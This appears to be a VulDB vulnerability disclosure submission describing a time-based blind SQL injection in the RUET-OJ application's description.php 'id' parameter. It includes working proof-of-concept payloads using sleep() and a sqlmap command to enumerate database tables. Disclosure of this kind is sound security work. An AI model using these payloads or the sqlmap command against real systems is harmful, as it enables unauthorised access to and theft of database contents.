Soumettre #674349: shawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injectioninformation

Titreshawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection
DescriptionThere is a Time Based Blind SQL Injection vulnerability in the "id" parameter of the description.php file, allowing an attacker to dump the entire database. You need to be authenticated in the application [POC] Use Burp proxy to verify the vulnerability. GET description.php, passing the payload in the id parameter. GET / description.php?id=id=55'+and+sleep(5)%23 To check the current database size, for example: id=55'+and+if(length(database())+=+3,sleep(5),0)%23 Automate with sqlmap: sqlmap -u http://<IP>/description.php?id= --cookie=PHPSESSID=f1cc07f2b44446f48035e77e8184cec7 -D reg --tables The person responsible for the application was informed via email on July 25, 2025. But I did not receive a response. Link application: https://github.com/shawon100/RUET-OJ
Utilisateur
 ManinhuGuitar (UID 84672)
Soumission13/10/2025 23:23 (il y a 7 mois)
Modérer27/10/2025 11:22 (14 days later)
StatutAccepté
Entrée VulDB330104 [shawon100 RUET OJ /description.php ID injection SQL]
Points17

Do you know our Splunk app?

Download it now for free!